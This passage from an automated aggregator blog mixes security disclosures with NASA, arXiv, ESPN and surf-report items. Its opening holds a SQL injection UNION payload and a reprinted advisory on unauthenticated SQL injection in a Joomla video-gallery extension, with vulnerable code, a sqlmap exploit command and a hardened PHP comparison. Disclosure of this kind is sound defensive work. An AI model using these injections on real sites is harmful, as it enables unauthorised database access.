    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

Source: Gmail -> IFTTT-> Blogger

[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla

Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://ift.tt/2dbJpd3
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: info@huge-it.com

Description: A video slideshow gallery.

Vulnerability: The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.

Vulnerable Code in: ajax_url.php

    define('_JEXEC',1);
    defined('_JEXEC') or die('Restircted access');
    . . .
    if($_POST['task']=="load_videos_content"){

        $page = 1;


        if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
            $paramssld='';
            $db5 = JFactory::getDBO();
            $query5 = $db->getQuery(true);
            $query5->select('*');
            $query5->from('#__huge_it_videogallery_params');
            $db->setQuery($query5);
            $options_params = $db5->loadObjectList();
            foreach ($options_params as $rowpar) {
                $key = $rowpar->name;
                $value = $rowpar->value;
                $paramssld[$key] = $value;
            }
            $page = $_POST["page"];
            $num=$_POST['perpage'];
            $start = $page * $num - $num;
            $idofgallery=$_POST['galleryid'];

            $query = $db->getQuery(true);
            $query->select('*');
            $query->from('#__huge_it_videogallery_videos');
            $query->where('videogallery_id ='.$idofgallery);
            $query ->order('#__huge_it_videogallery_videos.ordering asc');
            $db->setQuery($query,$start,$num);

CVE-2016-1000123

Exploit Code:

    $ sqlmap -u 'http://ift.tt/2d3pdXg' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
    .
    .
    .
    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:

Source: Gmail -> IFTTT-> Blogger
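
An added example (not code from the advisories or from the Huge-IT extensions) that sets the concatenation pattern quoted in both advisories above beside integer validation with bound parameters. PDO with in-memory SQLite stands in for Joomla's database driver; the table, its rows, the function names and the use of old_count as the row offset are assumptions made for illustration.

```php
<?php
// Constructed demo data: three products in two catalogs.
function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE products (
        id INTEGER PRIMARY KEY, catalog_id INTEGER, name TEXT, ordering INTEGER)');
    $db->exec("INSERT INTO products (catalog_id, name, ordering) VALUES
        (1, 'catalog 1 item A', 1),
        (1, 'catalog 1 item B', 2),
        (2, 'catalog 2 item',   1)");
    return $db;
}

// Pattern from the advisories: the request value is concatenated into the
// WHERE clause, so whatever follows the number is parsed as SQL.
function load_more_vulnerable(PDO $db, array $post): array
{
    $sql = 'SELECT * FROM products WHERE catalog_id =' . $post['catalog_id']
         . ' ORDER BY ordering ASC';
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Strict integer parsing with a range. Unlike is_numeric(), which the Video
// Gallery handler applies to `page` only, this rejects "1e3", "0x1A", floats,
// arrays and missing keys, and it is applied to every value used in the query.
function post_int(array $post, string $key, int $min, int $max): int
{
    $value = filter_var(
        $post[$key] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]
    );
    if ($value === false) {
        throw new InvalidArgumentException("invalid value for '$key'");
    }
    return $value;
}

// Hardened handler: validate first, then bind. The SQL text is constant, so
// request data can never change the shape of the statement.
function load_more_hardened(PDO $db, array $post): array
{
    $catalogId = post_int($post, 'catalog_id', 1, PHP_INT_MAX);
    $offset    = post_int($post, 'old_count', 0, 100000);      // assumed offset
    $limit     = post_int($post, 'count_into_page', 1, 100);   // capped page size

    $stmt = $db->prepare(
        'SELECT * FROM products WHERE catalog_id = :cid
         ORDER BY ordering ASC LIMIT :lim OFFSET :off'
    );
    $stmt->bindValue(':cid', $catalogId, PDO::PARAM_INT);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed request bodies: one well-formed, one carrying a tautology.
$db      = make_db();
$benign  = ['catalog_id' => '1',        'old_count' => '0', 'count_into_page' => '10'];
$tainted = ['catalog_id' => '1 OR 1=1', 'old_count' => '0', 'count_into_page' => '10'];

printf("vulnerable, benign:  %d rows\n", count(load_more_vulnerable($db, $benign)));
printf("vulnerable, tainted: %d rows\n", count(load_more_vulnerable($db, $tainted)));
printf("hardened, benign:    %d rows\n", count(load_more_hardened($db, $benign)));
try {
    load_more_hardened($db, $tainted);
} catch (InvalidArgumentException $e) {
    printf("hardened, tainted:   rejected (%s)\n", $e->getMessage());
}
```

Inside a Joomla extension the same effect comes from casting the request value with (int) before it reaches $query->where(), or passing string values through $db->quote().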

Introduction to Zcash, the anonymous Bitcoin

Bitcoin is an anonymous currency – this is one of greatest misconceptions surrounding Bitcoin which is, In a sense, the exact contrary of anonymous ...

from Google Alert - anonymous http://ift.tt/2cMOeXe
via IFTTT

NGC 3576: The Statue of Liberty Nebula


What's happening in the Statue of Liberty nebula? Bright stars and interesting molecules are forming and being liberated. The complex nebula resides in the star forming region called RCW 57. This image showcases dense knots of dark interstellar dust, bright stars that have formed in the past few million years, fields of glowing hydrogen gas ionized by these stars, and great loops of gas expelled by dying stars. A detailed study of NGC 3576, also known as NGC 3582 and NGC 3584, uncovered at least 33 massive stars in the end stages of formation, and the clear presence of the complex carbon molecules known as polycyclic aromatic hydrocarbons (PAHs). PAHs are thought to be created in the cooling gas of star forming regions, and their development in the Sun's formation nebula five billion years ago may have been an important step in the development of life on Earth. The featured image was taken at the Cerro Tololo Inter-American Observatory in Chile. via NASA http://ift.tt/2d6xf5q

GPM sees Louisiana Floods

Twice on August 12, 2016 GPM flew over a massive rainstorm that flooded large portions of Louisiana. The flooding was some of the worst ever in the state, resulting in a state of emergency. Tens of thousands of people were evacuated from their homes in the wake of this unprecedented event. Throughout the course of August 12 (UTC) GPM captured the internal structure of the storm twice and GPM IMERG measured the rainfall accumulation on the ground. NASA's GPM satellite is designed to measure rainfall using both passive microwave (GMI) and radar (DPR) instruments. DPR can observe 3D structures of radar signals reflected by rain and snow in a narrower swath. IMERG is a NASA data product that combines data from 12 different satellites into a single seamless map. IMERG covers more of the globe than any previous precipitation data set and is updated every half hour.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2d8vzbz
via IFTTT

Wednesday, September 28, 2016

Orioles Video: Hyun Soo Kim smacks pinch-hit HR in 9th to beat Blue Jays; now only 1 game behind Toronto for top WC spot (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

imported by the module 'MaterialAppModule'(anonymous function)

bootstrapModule @ application_ref.js:284(anonymous function) @ main.ts:11__webpack_require__ @ bootstrap d4f86e9…:52(anonymous function) ...

from Google Alert - anonymous http://ift.tt/2dsBkRh
via IFTTT

A Fast Factorization-based Approach to Robust PCA. (arXiv:1609.08677v1 [cs.CV])

Robust principal component analysis (RPCA) has been widely used for recovering low-rank matrices in many data mining and machine learning problems. It separates a data matrix into a low-rank part and a sparse part. The convex approach has been well studied in the literature. However, state-of-the-art algorithms for the convex approach usually have relatively high complexity due to the need of solving (partial) singular value decompositions of large matrices. A non-convex approach, AltProj, has also been proposed with lighter complexity and better scalability. Given the true rank $r$ of the underlying low rank matrix, AltProj has a complexity of $O(r^2dn)$, where $d\times n$ is the size of data matrix. In this paper, we propose a novel factorization-based model of RPCA, which has a complexity of $O(kdn)$, where $k$ is an upper bound of the true rank. Our method does not need the precise value of the true rank. From extensive experiments, we observe that AltProj can work only when $r$ is precisely known in advance; however, when the needed rank parameter $r$ is specified to a value different from the true rank, AltProj cannot fully separate the two parts while our method succeeds. Even when both work, our method is about 4 times faster than AltProj. Our method can be used as a light-weight, scalable tool for RPCA in the absence of the precise value of the true rank.



from cs.AI updates on arXiv.org http://ift.tt/2d5THbN
via IFTTT

Hierarchical Memory Networks for Answer Selection on Unknown Words. (arXiv:1609.08843v1 [cs.IR])

Recently, end-to-end memory networks have shown promising results on Question Answering task, which encode the past facts into an explicit memory and perform reasoning ability by making multiple computational steps on the memory. However, memory networks conduct the reasoning on sentence-level memory to output coarse semantic vectors and do not further take any attention mechanism to focus on words, which may lead to the model lose some detail information, especially when the answers are rare or unknown words. In this paper, we propose a novel Hierarchical Memory Networks, dubbed HMN. First, we encode the past facts into sentence-level memory and word-level memory respectively. Then, (k)-max pooling is exploited following reasoning module on the sentence-level memory to sample the (k) most relevant sentences to a question and feed these sentences into attention mechanism on the word-level memory to focus the words in the selected sentences. Finally, the prediction is jointly learned over the outputs of the sentence-level reasoning module and the word-level attention mechanism. The experimental results demonstrate that our approach successfully conducts answer selection on unknown words and achieves a better performance than memory networks.



from cs.AI updates on arXiv.org http://ift.tt/2cMbBjU
via IFTTT

Global Constraint Catalog, Volume II, Time-Series Constraints. (arXiv:1609.08925v1 [cs.AI])

First this report presents a restricted set of finite transducers used to synthesise structural time-series constraints described by means of a multi-layered function composition scheme. Second it provides the corresponding synthesised catalogue of structural time-series constraints where each constraint is explicitly described in terms of automata with accumulators.



from cs.AI updates on arXiv.org http://ift.tt/2dfTyCb
via IFTTT

Learning from the Hindsight Plan -- Episodic MPC Improvement. (arXiv:1609.09001v1 [cs.RO])

Model predictive control (MPC) is a popular control method that has proved effective for robotics, among other fields. MPC performs re-planning at every time step. Re-planning is done with a limited horizon per computational and real-time constraints and often also for robustness to potential model errors. However, the limited horizon leads to suboptimal performance. In this work, we consider the iterative learning setting, where the same task can be repeated several times, and propose a policy improvement scheme for MPC. The main idea is that between executions we can, offline, run MPC with a longer horizon, resulting in a hindsight plan. To bring the next real-world execution closer to the hindsight plan, our approach learns to re-shape the original cost function with the goal of satisfying the following property: short horizon planning (as realistic during real executions) with respect to the shaped cost should result in mimicking the hindsight plan. This effectively consolidates long-term reasoning into the short-horizon planning. We empirically evaluate our approach in contact-rich manipulation tasks both in simulated and real environments, such as peg insertion by a real PR2 robot.



from cs.AI updates on arXiv.org http://ift.tt/2d87u4D
via IFTTT

Mysteries of Visual Experience. (arXiv:1604.08612v2 [q-bio.NC] UPDATED)

Science is a crowning glory of the human spirit and its applications remain our best hope for social progress. But there are limitations to current science and perhaps to any science. The general mind-body problem is known to be intractable and currently mysterious. This is one of many deep problems that are universally agreed to be beyond the current purview of Science, including quantum phenomena, etc. But all of these famous unsolved problems are either remote from everyday experience (entanglement, dark matter) or are hard to even define sharply (phenomenology, consciousness, etc.).

In this note, we will consider some obvious computational problems in vision that arise every time that we open our eyes and yet are demonstrably incompatible with current theories of neural computation. The focus will be on two related phenomena, known as the neural binding problem and the illusion of a detailed stable visual world.



from cs.AI updates on arXiv.org http://ift.tt/1O8yt6o
via IFTTT

Anonymous

Anonymous. Major Events and Hacktivism #OpOlympicHacking. August 20, 2016 | RSA · Major Events and Hacktivism #OpOlympicHacking.

from Google Alert - anonymous http://ift.tt/2cWDx2g
via IFTTT

Apple Tracks Who You're Chatting Using iMessage — and Shares that Data with Police

Doing conversations with your friend on iMessage and thinking that they are safe and out of reach from anyone else other than you and your friend? No, it's not. End-to-end encryption doesn't mean that your iMessages are secure enough to hide your trace because Apple not only stores a lot of information about your iMessages that could reveal your contacts and location, but even share that


from The Hacker News http://ift.tt/2cWs7LK
via IFTTT

Ravens: LB Elvis Dumervil (foot) to make 2016 debut Sunday against Raiders, according to LB Terrell Suggs (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ocean City, MD's surf is at least 5.54ft high

Maryland-Delaware, October 04, 2016 at 04:00PM

Ocean City, MD Summary
At 4:00 AM, surf min of 2.36ft. At 10:00 AM, surf min of 3.22ft. At 4:00 PM, surf min of 5.54ft. At 10:00 PM, surf min of 5.99ft.

Surf maximum: 6.36ft (1.94m)
Surf minimum: 5.54ft (1.69m)
Tide height: 0.61ft (0.18m)
Wind direction: ENE
Wind speed: 24.76 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] [REVIVE-SA-2016-002] Revive Adserver - Multiple vulnerabilities

ISS Daily Summary Report – 09/27/2016

Group Combustion Module (GCM) Installation:  Today, FE-5 with the assistance of FE-6, started the first of two days of installation and preparation for the GCM experiment.  The crew began with assembly of the GCM attaching cameras and the Fuel Supply Syringe.  Following GCM setup, the crew then began configuration of the Combustion Chamber attaching the necessary valves and filters.  The GCM will then be installed into the Combustion Chamber.  The Elucidation of Flame Spread and Group Combustion Excitation Mechanism of Randomly-distributed Droplet Clouds (Group Combustion) investigation by the Japan Aerospace Exploration Agency (JAXA) tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets.  In the Multi-Purpose Small Payload Rack (MSPR) in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads.  Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made. Hard to Wet Surfaces:  FE-6 performed the battery charging activities for the Hard to Wet Surfaces payload.  Later today, the crew will verify the configuration and field of view of the camera used to collect data of the payload.  The Hard to Wet Surfaces (Eli Lilly-Hard to Wet Surfaces) investigation studies how certain materials used in the pharmaceutical industry dissolve in water while in microgravity.  Results from this investigation could help improve the design of tablets that dissolve in the body to deliver drugs, thereby improving drug design for medicines used in space and on Earth.  Marangoni Experiment (Dynamic Surf 3):  Last week ground controllers performed an Image Processing Unit (IPU) video check and determined the front cover fasteners required tightening.  
FE-5 performed the tightening over the weekend and subsequent IPU checks confirmed a good configuration to resume Dynamic Surf operations.  Last night, ground controllers initiated the first of two overnight of the Marangoni sessions in the Fluid Physics Experiment Facility (FPEF).  The Dynamic Surf investigation is part of a series of JAXA experiments studying Marangoni convection driven by the presence of surface tension gradients produced by a temperature difference at a liquid/gas interface.  By observing and understanding how a silicone oil liquid bridge moves, researchers can learn about how heat is transferred in microgravity and ultimately drive the design and development of more efficient fluid flow based systems and devices. Space Station Remote Manipulator System (SSRMS) Latching End Effector (LEE) Survey:  Today, Robotics Ground Controllers powered up the Mobile Servicing System (MSS) and maneuvered the SSRMS to the survey position for LEE B.  The EHDC was then used to survey the LEE Snare cables as it was done last Monday, but with different points of view and optimizing the lighting conditions for still imagery.  SSRMS performance today was nominal.  Waste and Hygiene Compartment (WHC) Urine Receptacle (UR) Replacement:  This morning the crew changed out the Urine Hose and Receptacle that was installed yesterday, recovering WHC functionality.  Yesterday, after the crew replaced the Urine Hose and Receptacle as part of regularly scheduled maintenance, the WHC Pump Separator unexpectedly continued to run after the crew closed a urine valve.  After cycling the valve, the Pump Separator did turn off.  WHC is approved for use at this time. JEM ORU Transfer Interface (JOTI) and Robotics External Leak Locator (RELL) Installation on Japanese Experiment Module (JEM) Airlock (A/L) Slide Table:  FE-6 ingressed Pressurized Mating Adapter-2 (PMA2), retrieved the JOTI hardware, and installed the JOTI on the JEM A/L Slide Table.  
Afterwards, the crew installed the Robotics External Leak Locator (RELL) onto the JOTI, and retracted the Slide Table inside the JEM A/L.  RELL is a technology demonstration designed to locate external ISS ammonia (NH3) leaks.  Prior to using it for locating actual leaks, an on-orbit test needs to be performed to understand the background environment of ISS and how that affects leak locating.  This on-orbit test will be scheduled later in Increment 49. Today’s Planned Activities All activities completed unless otherwise noted. WHC Urine Receptacle (UR) and Insert Filter (IF) Remove and Replace XF305 Camcorder Setup Group Combustion Module (GCM) Familiarization Group Combustion Module (GCM) Setup MRM2 comm config to support the P/L Ops Kulonovskiy Kristall Experiment Run. Node 2 Endcone Unstow PMA2 Ingress MRM2 Comm Reconfig for Nominal Ops KULONOVSKIY KRISTALL. Copy and Downlink Data Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Setup VIZIR. Experiment set up and start using СКПИ P/L. PMA2 Stowage Retrieval PMA2 Surface Inspection for Condensation PMA2 Egress Group Combustion Module (GCM) Install Node 2 Endcone Unstow Group Combustion Module (GCM) Install Support Water Recovery System Waste Water Tank Drain Init (Deferred) BEAM (Bigelow Expandable Activities Module) Modal Test Review Water Recovery System Waste Water Tank Drain Termination (Deferred) Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ JEM Airlock Slide Table (ST) Extension to JPM Side Personal CO2 Monitor Power Cycle Total Organic Carbon Analyzer (TOCA) Calibration Check Structures and Mechanisms JEM ORU Xfer I/F and Robo Ext Leak Locator Installation Spaceflight Cognitive Assessment Tool for Windows (WinSCAT) Test СОЖ Maintenance VIZIR. СКПИ Closeout Ops. 
JEM Airlock Slide Table (ST) Retraction from JPM Side Download Pille Dosimeter Readings Exercise Data Downlink via OCA Hard To Wet Surfaces Set Up Check Total Organic Carbon Analyzer (TOCA) Calibration Check Data Record Personal CO2 Monitor Power Cycle Personal CO2 Monitor iPad Application Restart Completed Task List Items None  Ground Activities All activities completed unless otherwise noted. Robotics Ground Control for SSRMS LEE Survey Three-Day Look Ahead: Wednesday, 09/28: Combustion Module Installation and Checkout, Finemotor Skills, Hard to Wet Surfaces Thursday, 09/29: BEAM Ingress and Modal Test Friday, 09/30: Energy Experiment, WSTA Fills QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) […]

from ISS On-Orbit Status Report http://ift.tt/2dls9MS
via IFTTT

The Weeknd “Star Boy”

The Weeknd “Star Boy”. The Weeknd “Star Boy”. Search. Videos. No results found. News. No results found.

from Google Alert - anonymous http://ift.tt/2drJWmJ
via IFTTT

[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : http://ift.tt/2cBcgkZ
# Vendor : Symantec
# CVE : CVE-2016-5312
# DESCRIPTION:
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)

Hello, Please find a text-only version below sent to security mailing lists. The complete version on analysing the security in Dlink 932B LTE routers is posted here: http://ift.tt/2deyBYo === text-version of the advisory without technical explanations ===

Source: Gmail -> IFTTT-> Blogger

[FD] Edward Snowden won Glas of Reason - (Glas der Vernunft) Award 2016

Award 2016 "Glas of Reason" (Glas der Vernunft) for Edward Snowden (10.000€) @snowden - Security Press Articles http://ift.tt/2cDspJG http://ift.tt/1GaYt2i http://ift.tt/2dkgRbV http://ift.tt/2cKIgGH http://ift.tt/2dkgHkS http://ift.tt/2cKJvpj http://ift.tt/2dkgKgs - http://ift.tt/2cKIQE3 http://ift.tt/2dkh3rJ http://ift.tt/2cKITjc http://ift.tt/2dkgT3q http://ift.tt/2cKIRrB http://ift.tt/2dkgEFA http://ift.tt/2cKIzB3 http://ift.tt/2dkgi1J - Note: The video recordings will be published transparently by an uncensored German source within the next days! Feel free to share and enjoy the unique statement.

Source: Gmail -> IFTTT-> Blogger

Ocean City, MD's surf is at least 5.73ft high

Maryland-Delaware, September 29, 2016 at 04:00PM

Ocean City, MD Summary
At 4:00 AM, surf min of 4.19ft. At 10:00 AM, surf min of 4.67ft. At 4:00 PM, surf min of 5.73ft. At 10:00 PM, surf min of 5.67ft.

Surf maximum: 6.3ft (1.92m)
Surf minimum: 5.73ft (1.75m)
Tide height: 1.6ft (0.49m)
Wind direction: E
Wind speed: 22.18 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Cosma

First try for Glitch animation. If you like, don't forget to press 'L' check this shot with this Soundtrack.

from Google Alert - anonymous http://ift.tt/2d3u5Mp
via IFTTT

World's largest 1 Tbps DDoS Attack launched from 152,000 hacked Smart Devices

Do you know — Your Smart Devices may have inadvertently participated in a record-breaking largest cyber attack that Internet has just witnessed. If you own a smart device like Internet-connected televisions, cars, refrigerators or thermostats, you might already be part of a botnet of millions of infected devices that was used to launch the biggest DDoS attack known to date, with peaks of over


from The Hacker News http://ift.tt/2cUVfmu
via IFTTT

Jupiters Europa from Spacecraft Galileo


What mysteries might be solved by peering into this crystal ball? In this case, the ball is actually a moon of Jupiter, the crystals are ice, and the moon is not only dirty but cracked beyond repair. Nevertheless, speculation is rampant that oceans exist under Europa's fractured ice-plains that could support life. This speculation was bolstered again this week by released images from the Hubble Space Telescope indicating that plumes of water vapor sometimes emanate from the ice-crusted moon -- plumes that might bring microscopic sea life to the surface. Europa, roughly the size of Earth's Moon, is pictured here in natural color as photographed in 1996 by the now-defunct Jupiter-orbiting Galileo spacecraft. Future observations by Hubble and planned missions such as the James Webb Space Telescope later this decade and a Europa flyby mission in the 2020s may further humanity's understanding not only of Europa and the early Solar System but also of the possibility that life exists elsewhere in the universe. via NASA http://ift.tt/2cI4cSM

Tuesday, September 27, 2016

Orioles fall to the Blue Jays 5-1, cling to one-game lead over the Tigers for the final AL wild-card spot (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles: Chris Davis and Buck Showalter both ejected for arguing in 7th inning of Tuesday's game against the Blue Jays (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Online Segment to Segment Neural Transduction. (arXiv:1609.08194v1 [cs.CL])

We introduce an online neural sequence to sequence model that learns to alternate between encoding and decoding segments of the input as it is read. By independently tracking the encoding and decoding representations our algorithm permits exact polynomial marginalization of the latent segmentation during training, and during decoding beam search is employed to find the best alignment path together with the predicted output sequence. Our model tackles the bottleneck of vanilla encoder-decoders that have to read and memorize the entire input sequence in their fixed-length hidden states before producing any output. It is different from previous attentive models in that, instead of treating the attention weights as output of a deterministic function, our model assigns attention weights to a sequential latent variable which can be marginalized out and permits online generation. Experiments on abstractive sentence summarization and morphological inflection show significant performance gains over the baseline encoder-decoders.



from cs.AI updates on arXiv.org http://ift.tt/2dxVCER
via IFTTT

Learning to Translate for Multilingual Question Answering. (arXiv:1609.08210v1 [cs.CL])

In multilingual question answering, either the question needs to be translated into the document language, or vice versa. In addition to direction, there are multiple methods to perform the translation, four of which we explore in this paper: word-based, 10-best, context-based, and grammar-based. We build a feature for each combination of translation direction and method, and train a model that learns optimal feature weights. On a large forum dataset consisting of posts in English, Arabic, and Chinese, our novel learn-to-translate approach was more effective than a strong baseline (p<0.05): translating all text into English, then training a classifier based only on English (original or translated) text.



from cs.AI updates on arXiv.org http://ift.tt/2d8d3Mu
via IFTTT

Top-N Recommendation on Graphs. (arXiv:1609.08264v1 [cs.IR])

Recommender systems play an increasingly important role in online applications to help users find what they need or prefer. Collaborative filtering algorithms that generate predictions by analyzing the user-item rating matrix perform poorly when the matrix is sparse. To alleviate this problem, this paper proposes a simple recommendation algorithm that fully exploits the similarity information among users and items and intrinsic structural information of the user-item matrix. The proposed method constructs a new representation which preserves affinity and structure information in the user-item rating matrix and then performs recommendation task. To capture proximity information about users and items, two graphs are constructed. Manifold learning idea is used to constrain the new representation to be smooth on these graphs, so as to enforce users and item proximities. Our model is formulated as a convex optimization problem, for which we need to solve the well-known Sylvester equation only. We carry out extensive empirical evaluations on six benchmark datasets to show the effectiveness of this approach.



from cs.AI updates on arXiv.org http://ift.tt/2dBezcB
via IFTTT

Decision Making Based on Cohort Scores for Speaker Verification. (arXiv:1609.08419v1 [cs.SD])

Decision making is an important component in a speaker verification system. For the conventional GMM-UBM architecture, the decision is usually conducted based on the log likelihood ratio of the test utterance against the GMM of the claimed speaker and the UBM. This single-score decision is simple but tends to be sensitive to the complex variations in speech signals (e.g. text content, channel, speaking style, etc.). In this paper, we propose a decision making approach based on multiple scores derived from a set of cohort GMMs (cohort scores). Importantly, these cohort scores are not simply averaged as in conventional cohort methods; instead, we employ a powerful discriminative model as the decision maker. Experimental results show that the proposed method delivers substantial performance improvement over the baseline system, especially when a deep neural network (DNN) is used as the decision maker, and the DNN input involves some statistical features derived from the cohort scores.



from cs.AI updates on arXiv.org http://ift.tt/2d8cFgO
via IFTTT

Local Training for PLDA in Speaker Verification. (arXiv:1609.08433v1 [cs.SD])

PLDA is a popular normalization approach for the i-vector model, and it has delivered state-of-the-art performance in speaker verification. However, PLDA training requires a large amount of labeled development data, which is highly expensive in most cases. A possible approach to mitigate the problem is various unsupervised adaptation methods, which use unlabeled data to adapt the PLDA scattering matrices to the target domain.

In this paper, we present a new `local training' approach that utilizes inaccurate but much cheaper local labels to train the PLDA model. These local labels discriminate speakers within a single conversion only, and so are much easier to obtain compared to the normal `global labels'. Our experiments show that the proposed approach can deliver significant performance improvement, particularly with limited globally-labeled data.



from cs.AI updates on arXiv.org http://ift.tt/2dBd6Tt
via IFTTT

Model-based Test Generation for Robotic Software: Automata versus Belief-Desire-Intention Agents. (arXiv:1609.08439v1 [cs.AI])

Robotic code needs to be verified to ensure its safety and functional correctness, especially when the robot is interacting with people. Testing the real code in simulation is a viable option. It reduces the costs of experiments and provides detail that is lost when using formal methods. However, generating tests that cover interesting scenarios, while executing most of the code, is a challenge amplified by the complexity of the interactions between the environment and the software. Model-based test generation methods can automate otherwise manual processes and facilitate reaching rare scenarios during testing. In this paper, we compare the use of Belief-Desire-Intention (BDI) agents as models for test generation, with more conventional, model-based test generation, that exploits automata and model checking techniques, and random test generation methods, in terms of practicality, performance, scalability, and exploration (`coverage'). Simulators and automated testbenches were implemented in Robot Operating System (ROS) and Gazebo, for testing the code of two robots, BERT2 in a cooperative manufacture (table assembly) task, and Tiago as a home care assistant. The results highlight the clear advantages of using BDI agents for test generation, compared to random and conventional automata-based approaches. BDI agents naturally emulate the agency present in Human-Robot Interaction (HRI). They are thus more expressive and scale well in HRI applications.



from cs.AI updates on arXiv.org http://ift.tt/2d8e5YM
via IFTTT

Weakly Supervised PLDA Training. (arXiv:1609.08441v1 [cs.LG])

PLDA is a popular normalization approach for the i-vector model, and it has delivered state-of-the-art performance in speaker verification. However, PLDA training requires a large amount of labelled development data, which is highly expensive in most cases. We present a cheap PLDA training approach, which assumes that speakers in the same session can be easily separated, and speakers in different sessions are simply different. This results in `weak labels' which are not fully accurate but cheap, leading to a weak PLDA training.

Our experimental results on real-life large-scale telephony customer service archives demonstrated that the weak training can offer good performance when human-labelled data are limited. More interestingly, the weak training can be employed as a discriminative adaptation approach, which is more efficient than the prevailing unsupervised method when human-labelled data are insufficient.



from cs.AI updates on arXiv.org http://ift.tt/2dBcVrk
via IFTTT

Collaborative Learning for Language and Speaker Recognition. (arXiv:1609.08442v1 [cs.SD])

This paper presents a unified model to perform language and speaker recognition simultaneously and altogether. The model is based on a multi-task recurrent neural network where the output of one task is fed as the input of the other, leading to a collaborative learning framework that can improve both language and speaker recognition by borrowing information from each other. Our experiments demonstrated that the multi-task model outperforms the task-specific models on both tasks.



from cs.AI updates on arXiv.org http://ift.tt/2d8dPcv
via IFTTT

AP16-OL7: A Multilingual Database for Oriental Languages and A Language Recognition Baseline. (arXiv:1609.08445v1 [cs.CL])

We present the AP16-OL7 database which was released as the training and test data for the oriental language recognition (OLR) challenge on APSIPA 2016. Based on the database, a baseline system was constructed on the basis of the i-vector model. We report the baseline results evaluated in various metrics defined by the AP16-OLR evaluation plan and demonstrate that AP16-OL7 is a reasonable data resource for multilingual research.



from cs.AI updates on arXiv.org http://ift.tt/2dBdfGC
via IFTTT

A computer program for simulating time travel and a possible 'solution' for the grandfather paradox. (arXiv:1609.08470v1 [cs.AI])

While the possibility of time travel in physics is still debated, the explosive growth of virtual-reality simulations opens up new possibilities to rigorously explore such time travel and its consequences in the digital domain. Here we provide a computational model of time travel and a computer program that allows exploring digital time travel. In order to explain our method we formalize a simplified version of the famous grandfather paradox, show how the system can allow the participant to go back in time, try to kill their ancestors before they were born, and experience the consequences. The system has even come up with scenarios that can be considered consistent "solutions" of the grandfather paradox. We discuss the conditions for digital time travel, which indicate that it has a large number of practical applications.



from cs.AI updates on arXiv.org http://ift.tt/2d8dXsk
via IFTTT

UbuntuWorld 1.0 LTS - A Platform for Automated Problem Solving & Troubleshooting in the Ubuntu OS. (arXiv:1609.08524v1 [cs.AI])

In this paper, we present UbuntuWorld 1.0 LTS - a platform for developing automated technical support agents in the Ubuntu operating system. Specifically, we propose to use the Bash terminal as a simulator of the Ubuntu environment for a learning-based agent and demonstrate the usefulness of adopting reinforcement learning (RL) techniques for basic problem solving and troubleshooting in this environment. We provide a plug-and-play interface to the simulator as a python package where different types of agents can be plugged in and evaluated, and provide pathways for integrating data from online support forums like Ask Ubuntu into an automated agent's learning process. Finally, we show that the use of this data significantly improves the agent's learning efficiency. We believe that this platform can be adopted as a real-world test bed for research on automated technical support.



from cs.AI updates on arXiv.org http://ift.tt/2dBcFsF
via IFTTT

A partial taxonomy of judgment aggregation rules, and their properties. (arXiv:1502.05888v3 [cs.AI] UPDATED)

